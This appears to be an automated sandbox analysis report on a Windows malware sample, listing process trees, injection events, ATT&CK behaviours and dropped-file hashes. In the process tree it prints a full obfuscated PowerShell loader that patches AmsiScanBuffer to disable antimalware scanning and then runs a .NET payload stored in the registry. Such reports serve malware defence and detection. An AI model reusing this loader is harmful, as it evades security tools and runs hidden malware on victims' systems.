description pid Process Token: SeDebugPrivilege 2360 powershell.exe Token: SeDebugPrivilege 2368 $nya-Loli.bat Token: SeDebugPrivilege 4964 powershell.EXE Token: SeDebugPrivilege 4964 powershell.EXE Token: SeDebugPrivilege 1692 dllhost.exe Token: SeAssignPrimaryTokenPrivilege 2772 svchost.exe Token: SeIncreaseQuotaPrivilege 2772 svchost.exe Token: SeSecurityPrivilege 2772 svchost.exe Token: SeTakeOwnershipPrivilege 2772 svchost.exe Token: SeLoadDriverPrivilege 2772 svchost.exe Token: SeSystemtimePrivilege 2772 svchost.exe Token: SeBackupPrivilege 2772 svchost.exe Token: SeRestorePrivilege 2772 svchost.exe Token: SeShutdownPrivilege 2772 svchost.exe Token: SeSystemEnvironmentPrivilege 2772 svchost.exe Token: SeUndockPrivilege 2772 svchost.exe Token: SeManageVolumePrivilege 2772 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2772 svchost.exe Token: SeIncreaseQuotaPrivilege 2772 svchost.exe Token: SeSecurityPrivilege 2772 svchost.exe Token: SeTakeOwnershipPrivilege 2772 svchost.exe Token: SeLoadDriverPrivilege 2772 svchost.exe Token: SeSystemtimePrivilege 2772 svchost.exe Token: SeBackupPrivilege 2772 svchost.exe Token: SeRestorePrivilege 2772 svchost.exe Token: SeShutdownPrivilege 2772 svchost.exe Token: SeSystemEnvironmentPrivilege 2772 svchost.exe Token: SeUndockPrivilege 2772 svchost.exe Token: SeManageVolumePrivilege 2772 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2772 svchost.exe Token: SeIncreaseQuotaPrivilege 2772 svchost.exe Token: SeSecurityPrivilege 2772 svchost.exe Token: SeTakeOwnershipPrivilege 2772 svchost.exe Token: SeLoadDriverPrivilege 2772 svchost.exe Token: SeSystemtimePrivilege 2772 svchost.exe Token: SeBackupPrivilege 2772 svchost.exe Token: SeRestorePrivilege 2772 svchost.exe Token: SeShutdownPrivilege 2772 svchost.exe Token: SeSystemEnvironmentPrivilege 2772 svchost.exe Token: SeUndockPrivilege 2772 svchost.exe Token: SeManageVolumePrivilege 2772 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2772 svchost.exe Token: SeIncreaseQuotaPrivilege 2772 svchost.exe Token: SeSecurityPrivilege 2772 svchost.exe Token: SeTakeOwnershipPrivilege 2772 svchost.exe Token: SeLoadDriverPrivilege 2772 svchost.exe Token: SeSystemtimePrivilege 2772 svchost.exe Token: SeBackupPrivilege 2772 svchost.exe Token: SeRestorePrivilege 2772 svchost.exe Token: SeShutdownPrivilege 2772 svchost.exe Token: SeSystemEnvironmentPrivilege 2772 svchost.exe Token: SeUndockPrivilege 2772 svchost.exe Token: SeManageVolumePrivilege 2772 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2772 svchost.exe Token: SeIncreaseQuotaPrivilege 2772 svchost.exe Token: SeSecurityPrivilege 2772 svchost.exe Token: SeTakeOwnershipPrivilege 2772 svchost.exe Token: SeLoadDriverPrivilege 2772 svchost.exe Token: SeSystemtimePrivilege 2772 svchost.exe Token: SeBackupPrivilege 2772 svchost.exe Token: SeRestorePrivilege 2772 svchost.exe Token: SeShutdownPrivilege 2772 svchost.exe Token: SeSystemEnvironmentPrivilege 2772 svchost.exe Token: SeUndockPrivilege 2772 svchost.exe -
Suspicious use of FindShellTrayWindow 25 IoCs
pid Process 3360 Explorer.EXE 2952 taskmgr.exe 2952 taskmgr.exe 2952 taskmgr.exe 2952 taskmgr.exe 2952 taskmgr.exe 2952 taskmgr.exe 2952 taskmgr.exe 2952 taskmgr.exe 2952 taskmgr.exe 2952 taskmgr.exe 2952 taskmgr.exe 2952 taskmgr.exe 2952 taskmgr.exe 2952 taskmgr.exe 2952 taskmgr.exe 2952 taskmgr.exe 2952 taskmgr.exe 2952 taskmgr.exe 2952 taskmgr.exe 2952 taskmgr.exe 2952 taskmgr.exe 2952 taskmgr.exe 2952 taskmgr.exe 2952 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 3360 Explorer.EXE 2952 taskmgr.exe 3360 Explorer.EXE -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 2368 $nya-Loli.bat 1372 MiniSearchHost.exe 3360 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2624 wrote to memory of 2360 2624 zovoX.exe 78 PID 2624 wrote to memory of 2360 2624 zovoX.exe 78 PID 2360 wrote to memory of 2368 2360 powershell.exe 80 PID 2360 wrote to memory of 2368 2360 powershell.exe 80 PID 2368 wrote to memory of 2824 2368 $nya-Loli.bat 82 PID 2368 wrote to memory of 2824 2368 $nya-Loli.bat 82 PID 2368 wrote to memory of 3564 2368 $nya-Loli.bat 84 PID 2368 wrote to memory of 3564 2368 $nya-Loli.bat 84 PID 2368 wrote to memory of 3564 2368 $nya-Loli.bat 84 PID 2368 wrote to memory of 3564 2368 $nya-Loli.bat 84 PID 3564 wrote to memory of 4296 3564 powershell.exe 86 PID 3564 wrote to memory of 4296 3564 powershell.exe 86 PID 3564 wrote to memory of 4296 3564 powershell.exe 86 PID 3564 wrote to memory of 4296 3564 powershell.exe 86 PID 3564 wrote to memory of 4296 3564 powershell.exe 86 PID 3564 wrote to memory of 4296 3564 powershell.exe 86 PID 3564 wrote to memory of 4296 3564 powershell.exe 86 PID 3564 wrote to memory of 4296 3564 powershell.exe 86 PID 3564 wrote to memory of 4296 3564 powershell.exe 86 PID 4964 wrote to memory of 1692 4964 powershell.EXE 89 PID 4964 wrote to memory of 1692 4964 powershell.EXE 89 PID 4964 wrote to memory of 1692 4964 powershell.EXE 89 PID 4964 wrote to memory of 1692 4964 powershell.EXE 89 PID 4964 wrote to memory of 1692 4964 powershell.EXE 89 PID 4964 wrote to memory of 1692 4964 powershell.EXE 89 PID 4964 wrote to memory of 1692 4964 powershell.EXE 89 PID 4964 wrote to memory of 1692 4964 powershell.EXE 89 PID 1692 wrote to memory of 648 1692 dllhost.exe 5 PID 1692 wrote to memory of 700 1692 dllhost.exe 7 PID 1692 wrote to memory of 996 1692 dllhost.exe 12 PID 1692 wrote to memory of 564 1692 dllhost.exe 13 PID 1692 wrote to memory of 712 1692 dllhost.exe 14 PID 1692 wrote to memory of 756 1692 dllhost.exe 15 PID 1692 wrote to memory of 1076 1692 dllhost.exe 16 PID 1692 wrote to memory of 1084 1692 dllhost.exe 17 PID 1692 wrote to memory of 1220 1692 dllhost.exe 19 PID 1692 wrote to memory of 1248 1692 dllhost.exe 20 PID 1692 wrote to memory of 1296 1692 dllhost.exe 21 PID 1692 wrote to memory of 1320 1692 dllhost.exe 22 PID 1692 wrote to memory of 1408 1692 dllhost.exe 23 PID 1692 wrote to memory of 1432 1692 dllhost.exe 24 PID 1692 wrote to memory of 1476 1692 dllhost.exe 25 PID 1692 wrote to memory of 1504 1692 dllhost.exe 26 PID 1692 wrote to memory of 1532 1692 dllhost.exe 27 PID 1692 wrote to memory of 1736 1692 dllhost.exe 28 PID 1692 wrote to memory of 1760 1692 dllhost.exe 29 PID 1692 wrote to memory of 1776 1692 dllhost.exe 30 PID 1692 wrote to memory of 1868 1692 dllhost.exe 31 PID 1692 wrote to memory of 1952 1692 dllhost.exe 32 PID 1692 wrote to memory of 2004 1692 dllhost.exe 33 PID 1692 wrote to memory of 2024 1692 dllhost.exe 34 PID 1692 wrote to memory of 1836 1692 dllhost.exe 35 PID 1692 wrote to memory of 2056 1692 dllhost.exe 36 PID 1692 wrote to memory of 2120 1692 dllhost.exe 37 PID 1692 wrote to memory of 2288 1692 dllhost.exe 39 PID 1692 wrote to memory of 2396 1692 dllhost.exe 40 PID 1692 wrote to memory of 2556 1692 dllhost.exe 41 PID 1692 wrote to memory of 2564 1692 dllhost.exe 42 PID 1692 wrote to memory of 2632 1692 dllhost.exe 43 PID 1692 wrote to memory of 2648 1692 dllhost.exe 44 PID 1692 wrote to memory of 2716 1692 dllhost.exe 45 PID 1692 wrote to memory of 2724 1692 dllhost.exe 46 PID 1692 wrote to memory of 2752 1692 dllhost.exe 47 PID 1692 wrote to memory of 2764 1692 dllhost.exe 48 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:648
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:564
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{3e56bfce-726c-4b8f-9283-d3263c96abd5}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1692
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:700
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:996
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:712
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:756
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1076
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1084
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1220
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1248 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:BetvLqzIQfXU{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$mskZeRDtWnqfrJ,[Parameter(Position=1)][Type]$OLRhvfADOC)$kfzmXjndVHv=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Re'+'f'+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+[Char](100)+'Del'+'e'+''+[Char](103)+''+[Char](97)+''+'t'+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+'e'+[Char](109)+''+'o'+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+'d'+'u'+[Char](108)+''+'e'+'',$False).DefineType(''+'M'+''+[Char](121)+'D'+[Char](101)+''+'l'+''+'e'+''+[Char](103)+'at'+'e'+'T'+[Char](121)+'p'+[Char](101)+'',''+'C'+''+[Char](108)+''+'a'+''+'s'+''+'s'+''+[Char](44)+''+'P'+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+''+'l'+''+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+'n'+'s'+'i'+''+'C'+'la'+[Char](115)+''+[Char](115)+','+'A'+'u'+[Char](116)+'o'+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$kfzmXjndVHv.DefineConstructor('R'+[Char](84)+'Sp'+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+'Na'+'m'+''+[Char](101)+''+','+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+'yS'+'i'+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+'li'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$mskZeRDtWnqfrJ).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+'t'+'i'+'m'+[Char](101)+''+[Char](44)+''+'M'+'a'+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+'d'+'');$kfzmXjndVHv.DefineMethod(''+[Char](73)+'n'+[Char](118)+'ok'+[Char](101)+'','P'+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+'c'+',H'+[Char](105)+'d'+[Char](101)+''+'B'+''+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+',Vi'+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$OLRhvfADOC,$mskZeRDtWnqfrJ).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+'t'+'im'+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+'a'+'g'+'e'+'d');Write-Output $kfzmXjndVHv.CreateType();}$ggzAZnEaJoIPE=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+[Char](116)+'e'+'m'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+'c'+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+''+[Char](116)+''+'.'+'W'+'i'+''+[Char](110)+''+[Char](51)+'2'+[Char](46)+''+[Char](85)+''+[Char](110)+''+'s'+'af'+[Char](101)+''+[Char](78)+''+'a'+'t'+'i'+''+[Char](118)+'e'+[Char](77)+''+'e'+''+'t'+''+'h'+'ods');$GyVKHHZojcLTwT=$ggzAZnEaJoIPE.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'P'+''+[Char](114)+''+[Char](111)+''+'c'+''+[Char](65)+''+[Char](100)+''+[Char](100)+''+'r'+''+[Char](101)+''+[Char](115)+'s',[Reflection.BindingFlags](''+'P'+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+'t'+[Char](97)+'ti'+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$SbDpojLmJNvugFJbuSF=BetvLqzIQfXU @([String])([IntPtr]);$GwUtWipjhlmFTNAeeLWLqs=BetvLqzIQfXU @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$HzWcrLbXxKv=$ggzAZnEaJoIPE.GetMethod(''+'G'+''+[Char](101)+''+'t'+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+'n'+'e'+''+[Char](108)+''+'3'+''+[Char](50)+''+'.'+'d'+'l'+''+'l'+'')));$eXhvaismJaGhXU=$GyVKHHZojcLTwT.Invoke($Null,@([Object]$HzWcrLbXxKv,[Object](''+'L'+''+'o'+'a'+'d'+''+[Char](76)+''+'i'+''+'b'+''+[Char](114)+''+[Char](97)+''+'r'+''+'y'+'A')));$ckQmcQBqaYVDpyaSy=$GyVKHHZojcLTwT.Invoke($Null,@([Object]$HzWcrLbXxKv,[Object]('V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+''+[Char](80)+''+[Char](114)+''+'o'+'te'+[Char](99)+'t')));$CKKaiRc=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($eXhvaismJaGhXU,$SbDpojLmJNvugFJbuSF).Invoke(''+[Char](97)+''+[Char](109)+'s'+[Char](105)+'.'+[Char](100)+''+[Char](108)+'l');$ShhVhueMyFfZChNuX=$GyVKHHZojcLTwT.Invoke($Null,@([Object]$CKKaiRc,[Object](''+[Char](65)+''+[Char](109)+'s'+[Char](105)+''+[Char](83)+'c'+[Char](97)+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+'f'+''+[Char](102)+''+'e'+'r')));$ZZoOgnJxUP=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ckQmcQBqaYVDpyaSy,$GwUtWipjhlmFTNAeeLWLqs).Invoke($ShhVhueMyFfZChNuX,[uint32]8,4,[ref]$ZZoOgnJxUP);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$ShhVhueMyFfZChNuX,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ckQmcQBqaYVDpyaSy,$GwUtWipjhlmFTNAeeLWLqs).Invoke($ShhVhueMyFfZChNuX,[uint32]8,0x20,[ref]$ZZoOgnJxUP);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+'TWA'+[Char](82)+''+[Char](69)+'').GetValue('$'+'n'+''+[Char](121)+''+'a'+''+[Char](45)+''+[Char](115)+'t'+[Char](97)+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4964
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵PID:1296
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1320
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1408
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1432
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1476
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2648
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1504
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1532
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1736
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1760
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:1776
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1868
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1952
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2004
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2024
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1836
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2056
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2120
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2288
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2396
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2556
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2564
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
- Modifies data under HKEY_USERS
- Modifies registry class
PID:2632
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2716
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2724
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2752
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2764
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2772
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2784
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3108
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3360 -
C:\Users\Admin\AppData\Local\Temp\Compiled\zovoX.exe"C:\Users\Admin\AppData\Local\Temp\Compiled\zovoX.exe"2⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2624 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Process 'C:\Windows\$nya-onimai3\$nya-Loli.bat'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2360 -
C:\Windows\$nya-onimai3\$nya-Loli.bat"C:\Windows\$nya-onimai3\$nya-Loli.bat"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2368 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:2924
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Delete /TN "$nya-Loli_1" /F5⤵PID:2824
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"5⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3564 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"6⤵
- System Location Discovery: System Language Discovery
PID:4296
-
-
-
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /02⤵
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2952
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3516
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:3548
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
PID:3936
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4016
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
- Modifies registry class
PID:4052
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵PID:4084
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵PID:4328
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵PID:4524
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:2128
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:2384
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:1768
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1052
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:1488
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:2972
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:1940
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:2164
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:5060
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:4680
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}1⤵PID:2444
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.131⤵
- Modifies registry class
PID:3064
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:1372
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:628
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\BackgroundTransferApi\784edc71-a195-4721-a2ab-93c1c77d4f1f.down_data
Filesize555KB
MD55683c0028832cae4ef93ca39c8ac5029
SHA1248755e4e1db552e0b6f8651b04ca6d1b31a86fb
SHA256855abd360d8a8d6974eba92b70cbd09ce519bc8773439993f9ab37cb6847309e
SHA512aba434bd29be191c823b02ea9b639beb10647bbe7759bbffdaa790dfb1ec2c58d74c525ef11aacda209e4effe322d1d3a07b115446c8914b07a3bce4d8a0e2c3
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
Filesize290B
MD500676c1d2bd2d990f1d9144c5f75f891
SHA1aca12b6c5e8dd056725e4eba02aa023729b29344
SHA256b05e838ec67ad7ce427df5bc3bc6e6620b77b87fb51ce83b00718d8aa1e134e7
SHA51269d1125a474625124d1707d3c06d135aa0af124229ba1722604fc36915e619519b4c869db09cc8aa5345bf59db477759e3003d192f98ddc64b9865007556f49a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
